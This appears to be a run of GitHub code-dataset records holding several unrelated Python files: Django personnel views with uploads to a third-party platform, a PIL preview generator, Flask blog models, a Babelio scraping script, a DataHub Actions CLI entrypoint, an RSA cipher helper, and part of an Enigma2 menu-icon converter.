temp.CREATED_BY = request.session['UserID']\n temp.UPDATED_BY = request.session['UserID']\n temp.CREATED_TIME = timezone.now()\n\n temp.save()\n response_data['result'] = '0'\n else:\n response_data['msg'] = obj.errors\n response_data['result'] = '1'\n\n return HttpResponse(json.dumps(response_data))\n\n except Exception as e:\n response_data['msg'] = e\n response_data['result'] = '1'\n\n return HttpResponse(json.dumps(response_data))\n\n#处理禁用/启用班组\ndef disabled(request):\n response_data = {}\n if request.method == 'POST':\n fid = request.POST.get('fid')\n\n try:\n Person_info = T_Personnel.objects.get(FID=fid)\n\n if request.GET.get('type') == 'lock':\n Person_info.FStatus = 2\n elif request.GET.get('type') == 'unlock':\n Person_info.FStatus = 0\n\n Person_info.save()\n\n response_data['result'] = '0'\n return HttpResponse(json.dumps(response_data))\n except ObjectDoesNotExist:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n\n#处理退场/返场\ndef sign(request):\n response_data = {}\n if request.method == 'POST':\n fid = request.POST.get('fid')\n\n try:\n Person_info = T_Personnel.objects.get(FID=fid)\n\n if request.GET.get('type') == 'out':\n Person_info.FStatus = 1\n Person_info.FQuitDate = timezone.now()\n elif request.GET.get('type') == 'in':\n Person_info.FStatus = 0\n Person_info.FQuitDate = None\n\n Person_info.save()\n\n response_data['result'] = '0'\n return HttpResponse(json.dumps(response_data))\n except ObjectDoesNotExist:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n\n\n#刷新下拉列表框数据\ndef ref_certidropdowndata(obj, request):\n certiftype_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n obj.fields['FCertitypeID'].choices = get_dict_object(request, certiftype_info, 'FID', 'FBase')\n\n\n#链接上传图片窗口\ndef show_upload(request):\n obj = PersonnelCertificateModeForm()\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n ref_certidropdowndata(obj, request)\n\n if request.method == 'POST':\n obj = PersonnelCertificateModeForm(request.POST, request.FILES)\n ref_certidropdowndata(obj, request)\n\n if obj.is_valid():\n temp = obj.save(commit=False)\n temp.FPID = request.POST.get('FPID')\n temp.CREATED_PRJ = request.session['PrjID']\n temp.CREATED_ORG = request.session['UserOrg']\n temp.CREATED_BY = request.session['UserID']\n temp.UPDATED_BY = request.session['UserID']\n temp.CREATED_TIME = timezone.now()\n\n temp.save()\n\n url = '/personnel/show_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/certificateupload.html\", {'obj': obj, 'fid': fid})\n\n#图片明细数据源\ndef get_certificate(request):\n\n if request.method == 'GET':\n fpid = ''.join(str(request.GET.get('fid')).split('-'))\n\n Certificate_info = T_PersonnelCertificate.objects.filter(Q(FPID=fpid))\n\n dict = convert_to_dicts(Certificate_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Certificate_info.count(), 'data': dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n\n#链接上传入场安全培训窗口\ndef showTrain_upload(request):\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n if request.method == 'POST':\n fid = request.POST.get('FPID')\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n\n if request.POST.get('FIsSafetrain') == 'on':\n Person_info.FIsSafetrain 
= True\n else:\n Person_info.FIsSafetrain = False\n\n if request.POST.get('FSafetrainDate') == '':\n Person_info.FSafetrainDate = None\n else:\n Person_info.FSafetrainDate = request.POST.get('FSafetrainDate')\n\n if Person_info.FSafetrainHour == '':\n Person_info.FSafetrainHour = 0\n else:\n Person_info.FSafetrainHour = request.POST.get('FSafetrainHour')\n\n Person_info.FEntranceannex = request.FILES.get('FEntranceannex')\n Person_info.save()\n\n url = '/personnel/showTrain_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/safetrainupload.html\", {'obj': obj, 'fid': fid})\n\n\n#链接上传人员照片窗口\ndef showPhoto_upload(request):\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n if request.method == 'POST':\n fid = request.POST.get('FPID')\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n\n Person_info.FPhoto = request.FILES.get('FPhoto')\n Person_info.save()\n\n url = '/personnel/showPhoto_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/photoupload.html\", {'obj': obj, 'fid': fid})\n\n\n\n#入场安全培训数据源\ndef get_safetrain(request):\n\n if request.method == 'GET':\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n Person_info = T_Personnel.objects.filter(Q(FID=fid))\n\n dict = convert_to_dicts(Person_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Person_info.count(), 'data': dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n#获取沃土平台token\ndef get_wotutoken(prjid, callsigcode):\n try:\n devinterface_info = devinterface.objects.get(Q(CREATED_PRJ=prjid), Q(FCallSigCode=callsigcode))\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n APPFID = devinterface_info.FAppFID\n\n app_info = appkey.objects.get(Q(FID=APPFID))\n\n APPID = app_info.FAppID\n APPKEY = app_info.FAppkey\n APPSECRET = app_info.FAppSecret\n TIMESTAMP = round(app_info.FAppCreateTime.timestamp() * 1000)\n\n strkey = APPKEY + str(TIMESTAMP) + APPSECRET\n md_5 = hashlib.md5()\n md_5.update(strkey.encode(\"utf-8\"))\n SIGN = md_5.hexdigest()\n\n token = get_interface_result(initID, [APPID, APPKEY, str(TIMESTAMP), SIGN], [], [APPID])['data']\n\n return token\n except ObjectDoesNotExist:\n return ''\n\n\n#上传数据至沃土平台\ndef upload_person(request):\n if request.method == 'POST':\n prj_id = request.session['PrjID']\n response_data = {}\n\n upload_info = T_Personnel.objects.filter(Q(FWoTuGUID__isnull=True), Q(CREATED_PRJ=prj_id), ~Q(FStatus=2))\n\n if upload_info.count() == 0:\n response_data['result'] = 1\n\n return HttpResponse(json.dumps(response_data))\n\n devinterface_info = devinterface.objects.get(Q(FScope=0), Q(FCallSigCode='UPLOADPERSON'), Q(CREATED_PRJ=prj_id))\n APPFID = devinterface_info.FAppFID\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n app_info = appkey.objects.get(Q(FID=APPFID))\n APPID = app_info.FAppID\n TOKEN = get_wotutoken(prj_id, 'TOKENWOTU')\n\n for rows in upload_info:\n person_name = rows.FName\n person_idcard = rows.FIDcard\n if rows.FTel == None:\n person_tel = ''\n else:\n person_tel = rows.FTel\n person_type = str(rows.FType)\n\n result = get_interface_result(initID, [APPID, TOKEN, person_name, person_idcard, person_tel, person_type],[],[APPID])\n\n if result['result'] == 1:\n rows.FWoTuGUID = result['data']['guid']\n rows.save()\n\n response_data['result'] = 1\n else:\n response_data['result'] = 0\n response_data['msg'] = result['msg']\n\n return 
HttpResponse(json.dumps(response_data))\n\n\n#批量注册人脸至沃土平台\ndef regface_person(request):\n if request.method == 'POST':\n prj_id = request.session['PrjID']\n response_data = {}\n\n regface_info = T_Personnel.objects.filter(Q(FWoTuGUID__isnull=False), Q(CREATED_PRJ=prj_id), Q(FWoTuFaceGUID__isnull=True), ~Q(FPhoto=\"\"))\n\n if regface_info.count() == 0:\n response_data['result'] = 1\n\n return HttpResponse(json.dumps(response_data))\n\n devinterface_info = devinterface.objects.get(Q(FScope=0), Q(FCallSigCode='REGFACE'), Q(CREATED_PRJ=prj_id))\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n APPFID = devinterface_info.FAppFID\n app_info = appkey.objects.get(Q(FID=APPFID))\n APPID = app_info.FAppID\n TOKEN = get_wotutoken(prj_id, 'TOKENWOTU')\n #TOKEN = interfacesrvdata.objects.get(Q(FCallSigCode='WOTU_APP'), Q(FTag='TOKEN')).FValue\n\n for rows in regface_info:\n person_guid = rows.FWoTuGUID\n\n hostpath = request.get_host()\n imagepath = \"http://\" + hostpath + \"/media/\" + str(rows.FPhoto)\n #imagepath = \"http://39.106.148.205/media/\" + str(rows.FPhoto)\n\n result = get_interface_result(initID, [APPID, TOKEN, person_guid, imagepath], [], [APPID, person_guid])\n\n if result['result'] == 1:\n rows.FWoTuFaceGUID = result['data']['guid']\n rows.save()\n\n response_data['result'] = 1\n\n else:\n response_data['result'] = 0\n response_data['msg'] = result['msg']\n\n break\n\n return HttpResponse(json.dumps(response_data))\n\n\n\n\n","repo_name":"wjcyxx/ISMS","sub_path":"personnel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15800,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"74127685227","text":"# encoding: utf-8\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nimport math\nimport os\n\n\ndef create_preview_image(values, width=270, height=100):\n \"\"\"\n Creates an index preview image based on\n the values passed and returns a PIL image object.\n \"\"\"\n sfactor = 4 # for antialiasing\n padding_top = 21 # distance from top edge to line\n padding_bottom = 4 # distance from bottom edge to line\n padding_x = 5 # distance to the side edges\n radius_min = 0 # minimal circle radius\n swidth = width * sfactor\n sheight = height * sfactor\n circle_linewidth = 1\n stem_linewidth = 1\n stem_color = '#444444'\n sheight_range = (sheight - (padding_top * sfactor) -\n (padding_bottom * sfactor))\n num_values = len(values)\n slot_width = (swidth - (2 * (padding_x * sfactor))) / num_values\n img = Image.new(\"RGB\", (swidth, sheight), \"#FFFFFF\")\n draw = ImageDraw.Draw(img)\n y_bottom = sheight - (padding_bottom * sfactor)\n slotcount = 0\n for value in values:\n x = (slot_width / 2) + (slotcount * slot_width) + (padding_x * sfactor)\n y_top = padding_top * sfactor + ((1 - value) * sheight_range)\n r = radius(value, radius_min) * sfactor\n draw.line((x, y_top, x, y_bottom), fill=stem_color, width=(stem_linewidth * sfactor))\n # rear larger ellipse (black)\n draw.ellipse((x - r - (circle_linewidth * sfactor), y_top - r - (circle_linewidth * sfactor),\n x + r + (circle_linewidth * sfactor), y_top + r + (circle_linewidth * sfactor)),\n fill=(0, 0, 0), outline=(0, 0, 0))\n #front ellipse (white)\n draw.ellipse((x - r, y_top - r, x + r, y_top + r),\n fill=(255, 255, 255), outline=(255, 255, 255))\n slotcount += 1\n return img\n\n\ndef radius(v, minr):\n factor = 350.0\n return float(minr) + math.sqrt(factor * v)\n\n\ndef get_folder_path(id, root='.'):\n \"\"\"\n Returns the appropriate relative folder 
path\n for images with the given id\n \"\"\"\n idstring = \"%03d\" % id\n # three levels of sub folders taken from the last three digits\n return os.sep.join([root, idstring[-1], idstring[-2], idstring[-3], str(id)])\n\n\ndef save_image_versions(img, id, root_path):\n \"\"\"\n Saves the image in all required sizes\n in the appropriate path. Creates subfolders\n as necessary\n \"\"\"\n folder = get_folder_path(id, root_path)\n if not os.access(folder, os.F_OK):\n os.makedirs(folder)\n # preview image for browse page\n browse_img = img.resize((270, 100), Image.ANTIALIAS)\n browse_img = browse_img.convert(\"L\")\n browse_img.save(folder + os.sep + 'pv.png', 'PNG')\n # opengraph / facebook image\n og_img = img.resize((130, 48), Image.ANTIALIAS)\n og_img = og_img.convert(\"L\")\n og_img.save(folder + os.sep + 'og.png', 'PNG')\n\n\nif __name__ == '__main__':\n THUMBS_PATH = 'test/thumbs'\n values = [0.2, 0.8, 0.1, 0.75, 0.23, 0.99, 0.0, 1.0]\n img = create_preview_image(values)\n save_image_versions(img, 123, THUMBS_PATH)\n","repo_name":"okfn/yourtopia","sub_path":"yourtopia/indexpreview.py","file_name":"indexpreview.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"14908053606","text":"from typing import Any, Dict, List\n\n\nclass ValidationError(Exception):\n \"\"\"Exception class to raise Validation Errors.\"\"\"\n pass\n\n\n# Models Definitions \nclass Post:\n \"\"\"Post model and validation.\"\"\"\n\n def __init__(self, title: str, body: str, liked: bool):\n\n self.title = self.valid_title(title)\n self.body = body\n self.liked = liked\n\n @staticmethod\n def valid_title(title: str) -> str:\n \"\"\"Validate the title.\"\"\"\n try:\n assert len(title) > 15\n except AssertionError:\n raise ValidationError(\"Title is too short.\")\n finally:\n return title\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\"Prepare data to be jsonified.\"\"\"\n return {\n \"title\": self.title,\n \"body\": self.body,\n \"liked\": self.liked\n }\n\n# Connection with DB\ndb = [\n Post(\"Homero with at least 15 characters.\", \"Era um grande cara\", True)\n]\n\n# Repositories\nclass Repository:\n \"\"\"Data management class.\"\"\"\n\n @staticmethod\n def store(post: Post):\n \"\"\"Put the new post on the database.\"\"\"\n db.append(post)\n\n @staticmethod\n def get_all() -> List[Dict[str, Any]]:\n \"\"\"Retrieve the information present on db.\"\"\"\n return [instance.to_dict() for instance in db]","repo_name":"igormcsouza/flask-bluprints","sub_path":"blueprints/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39797953797","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
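An illustrative check of the shard-by-trailing-digits layout built by `get_folder_path` above (paths shown with a POSIX separator):

# id 123 -> "123": subfolder levels come from the last three digits, reversed.
print(get_folder_path(123, 'thumbs'))   # thumbs/3/2/1/123
print(get_folder_path(7, 'thumbs'))     # thumbs/7/0/0/7  ("%03d" pads to 007)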
import views\n\nurlpatterns = [\n # path('admin/', admin.site.urls),\n path('', views.create_jianli, name = 'create_jianli'),\n path('pro_exper', views.pro_exper, name = 'pro_exper'),\n path('work_exper', views.work_exper, name = 'work_exper'),\n path('show_jianli', views.show_jianli, name = 'show_jianli'),\n path('push_jianli1', views.push_jianli1, name = 'push_jianli1'),\n path('push_jianli', views.push_jianli, name = 'push_jianli'),\n path('upload_jianli', views.upload_jianli, name = 'upload_jianli'),\n\n]\n","repo_name":"2396259288/zhilian","sub_path":"jianli/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14043845378","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 24 18:06:12 2023\r\n\r\n@author: UsaiinBolt\r\n\"\"\"\r\n\r\nimport csv\r\nimport os\r\nfrom fonction import *\r\nimport time\r\n\r\n#setup database\r\n#create the database \r\ndb = sqlite3.connect('Babelio.db')\r\n\r\nc = db.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='Book'\")\r\nresult = c.fetchone()\r\nprint(result)\r\nif not(result):\r\n db.execute('''CREATE TABLE Book\r\n (id INTEGER PRIMARY KEY,\r\n Ean TEXT,\r\n Title TEXT,\r\n Author TEXT,\r\n Rating FLOAT,\r\n RatingNumber INT,\r\n ReviewNumber INT,\r\n Url TEXT,\r\n Babelio_id INT)''')\r\n \r\n #création de la table de tags\r\n db.execute('''CREATE TABLE Tags\r\n (id INTEGER PRIMARY KEY,\r\n idtag INT,\r\n tag TEXT)''')\r\n \r\n #Création de la table faisant la liaison entre les livres et les tags\r\n db.execute('''CREATE TABLE LiaisonTagBook\r\n (book_ean TEXT,\r\n book_title TEXT,\r\n tag_id INTEGER,\r\n PRIMARY KEY (book_ean, tag_id),\r\n FOREIGN KEY (book_ean) REFERENCES Book(Ean),\r\n FOREIGN KEY (book_title) REFERENCES Book(Title),\r\n FOREIGN KEY (tag_id) REFERENCES Tags(idtag))''')\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Définir le chemin du répertoire contenant les fichiers CSV\r\nchemin = 'C:/Users/UsaiinBolt/Documents/Projet librairie/csv_files'\r\n\r\n# Parcourir tous les fichiers du répertoire\r\nfichiernumber = 1\r\nt0=time.time()\r\nt=t0\r\nfor fichier in os.listdir(chemin):\r\n if fichier.endswith(\".csv\"):\r\n # Ouvrir le fichier CSV en mode lecture\r\n with open(os.path.join(chemin, fichier), \"r\") as f:\r\n # Lire toutes les lignes du fichier\r\n lignes = f.readlines()\r\n\r\n # Supprimer les lignes contenant \"#critiques\" ou \"#citations\"\r\n lignes = [ligne for ligne in lignes if \"#critiques\" not in ligne and \"#citations\" not in ligne]\r\n # Afficher chaque ligne restante\r\n lignenumber = 1\r\n for ligne in lignes: \r\n babelio_id = re.findall(r'\\d+',ligne)\r\n babelio_id = int(babelio_id[len(babelio_id)-1])\r\n c = db.cursor()\r\n c.execute(\"SELECT * FROM Book WHERE Babelio_id=?\",(babelio_id,))\r\n result = c.fetchone() \r\n if not result:\r\n ligne = ligne.strip()\r\n Add_to_DB(ligne[1:-1])\r\n print('fichier : ',fichiernumber,' ligne : ',lignenumber,' execution time : ',int((time.time()-t)*1000)/1000,'s time elapsed : ',int(time.time()-t0))\r\n t=time.time()\r\n lignenumber += 1\r\n fichiernumber += 1\r\n\r\n \r\n \r\n","repo_name":"UsaiinBolt/BabelioTagScrapping","sub_path":"Corps.py","file_name":"Corps.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18313286789","text":"from django.db import models\n\n\nclass Group(models.Model):\n\n number = 
models.IntegerField(\n null=True,\n blank=True)\n name = models.CharField(\n max_length=1,\n null=True,\n blank=True)\n\n def create_activation_code(self):\n from django.utils.crypto import get_random_string\n code = get_random_string(\n length=8,\n allowed_chars='1234567890qwertyuiop'\n )\n self.activation_code = code\n\n","repo_name":"sezimpain/rica_project","sub_path":"group/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42356816140","text":"import logging\nimport platform\nimport sys\n\nimport click\nimport stackprinter\nfrom datahub.cli.cli_utils import get_boolean_env_variable\nfrom prometheus_client import start_http_server\n\nimport datahub_actions as datahub_package\nfrom datahub_actions.cli.actions import actions\n\nlogger = logging.getLogger(__name__)\n\n# Configure logger.\nBASE_LOGGING_FORMAT = (\n \"[%(asctime)s] %(levelname)-8s {%(name)s:%(lineno)d} - %(message)s\"\n)\nlogging.basicConfig(format=BASE_LOGGING_FORMAT)\n\nMAX_CONTENT_WIDTH = 120\n\n\n@click.group(\n context_settings=dict(\n # Avoid truncation of help text.\n # See https://github.com/pallets/click/issues/486.\n max_content_width=MAX_CONTENT_WIDTH,\n )\n)\n@click.option(\n \"--enable-monitoring\",\n type=bool,\n is_flag=True,\n default=False,\n help=\"Enable prometheus monitoring endpoint. You can set the portnumber with --monitoring-port.\",\n)\n@click.option(\n \"--monitoring-port\",\n type=int,\n default=8000,\n help=\"\"\"Prometheus monitoring endpoint will be available on :/metrics.\n To enable monitoring use the --enable-monitoring flag\n \"\"\",\n)\n@click.option(\"--debug/--no-debug\", default=False)\n@click.version_option(\n version=datahub_package.nice_version_name(),\n prog_name=datahub_package.__package_name__,\n)\n@click.option(\n \"-dl\",\n \"--detect-memory-leaks\",\n type=bool,\n is_flag=True,\n default=False,\n help=\"Run memory leak detection.\",\n)\n@click.pass_context\ndef datahub_actions(\n ctx: click.Context,\n enable_monitoring: bool,\n monitoring_port: int,\n debug: bool,\n detect_memory_leaks: bool,\n) -> None:\n # Insulate 'datahub_actions' and all child loggers from inadvertent changes to the\n # root logger by the external site packages that we import.\n # (Eg: https://github.com/reata/sqllineage/commit/2df027c77ea0a8ea4909e471dcd1ecbf4b8aeb2f#diff-30685ea717322cd1e79c33ed8d37903eea388e1750aa00833c33c0c5b89448b3R11\n # changes the root logger's handler level to WARNING, causing any message below\n # WARNING level to be dropped after this module is imported, irrespective\n # of the logger's logging level! The lookml source was affected by this).\n\n # 1. Create 'datahub' parent logger.\n datahub_logger = logging.getLogger(\"datahub_actions\")\n # 2. Setup the stream handler with formatter.\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter(BASE_LOGGING_FORMAT)\n stream_handler.setFormatter(formatter)\n datahub_logger.addHandler(stream_handler)\n # 3. Turn off propagation to the root handler.\n datahub_logger.propagate = False\n # 4. 
Adjust log-levels.\n if debug or get_boolean_env_variable(\"DATAHUB_DEBUG\", False):\n logging.getLogger().setLevel(logging.INFO)\n datahub_logger.setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.WARNING)\n datahub_logger.setLevel(logging.INFO)\n if enable_monitoring:\n start_http_server(monitoring_port)\n # Setup the context for the memory_leak_detector decorator.\n ctx.ensure_object(dict)\n ctx.obj[\"detect_memory_leaks\"] = detect_memory_leaks\n\n\ndef main(**kwargs):\n # This wrapper prevents click from suppressing errors.\n try:\n sys.exit(datahub_actions(standalone_mode=False, **kwargs))\n except click.exceptions.Abort:\n # Click already automatically prints an abort message, so we can just exit.\n sys.exit(1)\n except click.ClickException as error:\n error.show()\n sys.exit(1)\n except Exception as exc:\n logger.error(\n stackprinter.format(\n exc,\n line_wrap=MAX_CONTENT_WIDTH,\n truncate_vals=10 * MAX_CONTENT_WIDTH,\n suppressed_paths=[r\"lib/python.*/site-packages/click/\"],\n show_vals=False,\n )\n )\n logger.info(\n f\"DataHub Actions version: {datahub_package.__version__} at {datahub_package.__file__}\"\n )\n logger.info(\n f\"Python version: {sys.version} at {sys.executable} on {platform.platform()}\"\n )\n sys.exit(1)\n\n\ndatahub_actions.add_command(actions)\n","repo_name":"acryldata/datahub-actions","sub_path":"datahub-actions/src/datahub_actions/entrypoints.py","file_name":"entrypoints.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"9715420020","text":"# regex intro\n\nimport re, sys\n\npattern = sys.argv[1]\nsearch_string = sys.argv[2]\nmatch = re.match(pattern, search_string)\n\nif match:\n template = \"'{} matches pattern '{}'\"\nelse:\n template = \"'{} doesn't match pattern '{}'\"\n\nprint(template.format(search_string, pattern))\n","repo_name":"thatguysilver/py3oop","sub_path":"ch8/repractice.py","file_name":"repractice.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71772868587","text":"from io import BytesIO\nfrom typing import Callable, Union\n\nfrom Cryptodome import Random\nfrom Cryptodome.Cipher.PKCS1_v1_5 import PKCS115_Cipher\nfrom Cryptodome.PublicKey import RSA\n\nBuffer = Union[bytes, bytearray, memoryview]\n\n\ndef batched(source: Buffer, size: int):\n for i in range(0, len(source), size):\n yield source[i : i + size]\n\n\nclass RsaCipher(PKCS115_Cipher):\n def __init__(\n self,\n key: RSA.RsaKey,\n randfunc: Callable[[int], bytes],\n ):\n self._key = key\n self._randfunc = randfunc\n\n # https://datatracker.ietf.org/doc/html/rfc8017#section-7.2\n # mLen: message octet length\n # k: key octet length\n # mLen <= k - 11\n self._key_length = key.size_in_bytes()\n self._message_length = self._key_length - 11\n\n super().__init__(self._key, self._randfunc)\n\n def encrypt(self, message: Buffer) -> bytes:\n buffer = BytesIO()\n for chunk in batched(message, self._message_length):\n buffer.write(super().encrypt(chunk))\n return buffer.getvalue()\n\n def decrypt(self, ciphertext: Buffer) -> bytes:\n buffer = BytesIO()\n for chunk in batched(ciphertext, self._key_length):\n buffer.write(super().decrypt(chunk, b\"\"))\n return buffer.getvalue()\n\n @classmethod\n def new(cls, key: RSA.RsaKey):\n return cls(key, 
Random.get_random_bytes)\n","repo_name":"lzl12snd/cmp_backend","sub_path":"backend/utils/weiyi/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75171310506","text":"# -*- coding: utf-8 -*-\n\n# Menu Icon Path Converter\n#\n# Coded/Modified/Adapted by oerlgrey\n# Based on teamBlue image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Tools.Directories import fileExists\nfrom Components.Converter.Poll import Poll\n\nclass PlatoonHDMenuIconPath(Poll, Converter, object):\n\tdef __init__(self, type):\n\t\tPoll.__init__(self)\n\t\tConverter.__init__(self, type)\n\t\tself.poll_interval = 100\n\t\tself.poll_enabled = True\n\t\tself.type = str(type)\n\t\tself.path = \"/usr/share/enigma2/PlatoonHD/menu-icons/\"\n\t\t\n\t\tself.names = [\n\t\t(\"about_screen\", \"info.png\"),\n\t\t(\"animation_setup\", \"setup.png\"),\n\t\t(\"aspectratio_switch\", \"screen.png\"),\n\t\t(\"audio_menu\", \"audio.png\"),\n\t\t(\"audio_setup\", \"audio.png\"),\n\t\t(\"auto_scan\", \"tuner.png\"),\n\t\t(\"autolanguage_setup\", \"language.png\"),\n\t\t(\"autores_setup\", \"screen.png\"),\n\t\t(\"autoshutdown_setup\", \"shutdowntimer.png\"),\n\t\t(\"autotimer_setup\", \"timer.png\"),\n\t\t(\"av_setup\", \"movie_list.png\"),\n\t\t(\"blindscan\", \"tuner.png\"),\n\t\t(\"buttonsetup_setup\", \"setup.png\"),\n\t\t(\"cablescan\", \"tuner.png\"),\n\t\t(\"cam_setup\", \"setup.png\"),\n\t\t(\"channelselection_setup\", \"setup.png\"),\n\t\t(\"ci_assign\", \"setup.png\"),\n\t\t(\"ci_setup\", \"setup.png\"),\n\t\t(\"cooltvguide\", \"epg.png\"),\n\t\t(\"crontimer_edit\", \"timer.png\"),\n\t\t(\"deep_standby\", \"shutdown.png\"),\n\t\t(\"default_lists\", \"paket.png\"),\n\t\t(\"default_wizard\", \"paket.png\"),\n\t\t(\"device_manager\", \"hdd.png\"),\n\t\t(\"device_screen\", \"hdd.png\"),\n\t\t(\"device_setup\", \"hdd.png\"),\n\t\t(\"devicemanager\", \"hdd.png\"),\n\t\t(\"devices_menu\", \"hdd.png\"),\n\t\t(\"display_selection\", \"look.png\"),\n\t\t(\"display_setup\", \"look.png\"),\n\t\t(\"dns_setup\", \"net.png\"),\n\t\t(\"dreamplex\", \"plugin.png\"),\n\t\t(\"dvd_player\", \"dvd.png\"),\n\t\t(\"dvdplayer\", \"dvd.png\"),\n\t\t(\"dvdplayer_setup\", \"dvd.png\"),\n\t\t(\"ecm_info\", \"tuner.png\"),\n\t\t(\"epg_menu\", \"epg.png\"),\n\t\t(\"epg_settings\", \"epg.png\"),\n\t\t(\"epg_setup\", \"epg.png\"),\n\t\t(\"epgloadsave_menu\", \"epg.png\"),\n\t\t(\"epgrefresh\", \"epg.png\"),\n\t\t(\"extended_selection\", \"setup.png\"),\n\t\t(\"factory_reset\", \"reset.png\"),\n\t\t(\"fansetup_config\", \"setup.png\"),\n\t\t(\"fastscan\", \"tuner.png\"),\n\t\t(\"harddisk_check\", \"hdd.png\"),\n\t\t(\"harddisk_convert\", \"hdd.png\"),\n\t\t(\"harddisk_init\", \"hdd.png\"),\n\t\t(\"harddisk_setup\", \"hdd.png\"),\n\t\t(\"hardisk_selection\", \"hdd.png\"),\n\t\t(\"hardreset\", \"restart.png\"),\n\t\t(\"hdmicec\", \"setup.png\"),\n\t\t(\"hotkey_setup\", \"remote.png\"),\n\t\t(\"inadyn_setup\", \"net.png\"),\n\t\t(\"info_screen\", 
\"info.png\"),\n\t\t(\"infopanel\", \"info.png\"),\n\t\t(\"input_device_setup\", \"remote.png\"),\n\t\t(\"ipbox_client_Start\", \"net.png\"),\n\t\t(\"keyboard\", \"keyb.png\"),\n\t\t(\"keyboard_setup\", \"keyb.png\"),\n\t\t(\"language_setup\", \"language.png\"),\n\t\t(\"lcd4linux\", \"plugin.png\"),\n\t\t(\"lcd_setup\", \"setup.png\"),\n\t\t(\"lcd_skin_setup\", \"setup.png\"),\n\t\t(\"led_giga\", \"setup.png\"),\n\t\t(\"ledmanager\", \"setup.png\"),\n\t\t(\"loadepgcache\", \"setup.png\"),\n\t\t(\"logs_setup\", \"setup.png\"),\n\t\t(\"maintenance_mode\", \"reset.png\"),\n\t\t(\"manual_scan\", \"tuner.png\"),\n\t\t(\"media_player\", \"movie_list.png\"),\n\t\t(\"mediaportal\", \"plugin.png\"),\n\t\t(\"merlin_music_player\", \"audio.png\"),\n\t\t(\"minidlna_setup\", \"net.png\"),\n\t\t(\"movie_list\", \"movie_list.png\"),\n\t\t(\"moviebrowser\", \"movie_list.png\"),\n\t\t(\"multi_quick\", \"plugin.png\"),\n\t\t(\"netafp_setup\", \"net.png\"),\n\t\t(\"netftp_setup\", \"net.png\"),\n\t\t(\"netmounts_setup\", \"net.png\"),\n\t\t(\"netnfs_setup\", \"net.png\"),\n\t\t(\"netrts_setup\", \"net.png\"),\n\t\t(\"netsabnzbd_setup\", \"net.png\"),\n\t\t(\"netsatpi_setup\", \"net.png\"),\n\t\t(\"netsmba_setup\", \"net.png\"),\n\t\t(\"nettelnet_setup\", \"net.png\"),\n\t\t(\"netushare_setup\", \"net.png\"),\n\t\t(\"netvpn_setup\", \"net.png\"),\n\t\t(\"network_info_screen\", \"info.png\"),\n\t\t(\"network_menu\", \"net.png\"),\n\t\t(\"network_setup\", \"net.png\"),\n\t\t(\"numzapext_setup\", \"remote.png\"),\n\t\t(\"openstore\", \"net.png\"),\n\t\t(\"openwebif\", \"setup.png\"),\n\t\t(\"osd3dsetup\", \"screen.png\"),\n\t\t(\"osd_position_setup\", \"screen.png\"),\n\t\t(\"osd_setup\", 